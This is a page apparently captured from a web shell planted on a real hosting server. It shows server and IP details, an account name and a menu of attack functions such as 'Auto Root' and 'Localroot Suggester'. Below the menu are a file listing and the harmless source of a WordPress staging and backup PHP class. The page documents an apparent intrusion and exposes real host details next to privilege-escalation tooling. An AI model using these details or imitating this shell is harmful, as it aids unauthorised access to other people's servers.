Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
app /
classes /
Delete
Unzip
Name
Size
Permission
Date
Action
class.A2OptAction.php
16.53
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptBase.php
34.32
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal.php
27.68
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal8.php
23.09
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla.php
28.43
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla25.php
178
B
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla3.php
182
B
-rw-r--r--
2025-04-29 15:40
class.A2OptMagento.php
16.07
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptMemcache.php
7.77
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptOpenCart.php
25.74
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptPDO.php
683
B
-rw-r--r--
2025-04-29 15:40
class.A2OptPrestaShop.php
21.11
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptStaging.php
1.87
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTest.php
5.06
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTurboCache.php
14.24
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptWordPress.php
48.93
KB
-rw-r--r--
2025-04-29 15:40
class.A2Optimize.php
5.25
KB
-rw-r--r--
2025-04-29 15:40
class.MemcacheLite.php
5.22
KB
-rw-r--r--
2025-04-29 15:40
class.MemcachedInstance.php
3.82
KB
-rw-r--r--
2025-04-29 15:40
Save
Rename
<?php class A2OptStaging extends A2OptBase{ public function __construct(){ parent::__construct(); } public function apply_action(){ if(!isset($this->action)){ $this->error("No action was given with the request"); } switch($this->action){ case 'backup': echo $this->generate_backup(); exit; //$this->download_backup($file); break; default: $this->error("\"{$this->action}\" is not a supported action."); } } private function download_backup($file){ header("Content-Type: application/zip"); header("Content-Disposition: attachment; filename=".basename($file)); header("Content-Length: " . filesize($file)); readfile($file); exit(); } private function generate_backup(){ if(isset($this->app)){ if(isset($this->app->type)){ $exclude_dirs = array(); foreach($this->apps as $path=>$app){ if($path != $this->app->path){ array_push($exclude_dirs,$path); } } switch($this->app->type){ case 'WordPress': $wordpress = new A2OptWordPress($this->app); $url = $wordpress->backup($exclude_dirs); return $url; break; default: $this->error("Backups are not currently supported for {$this->app->type}"); } } else{ $this->error("The request was missing the application data."); } } else{ $this->error("The request was missing the application data."); } return false; } }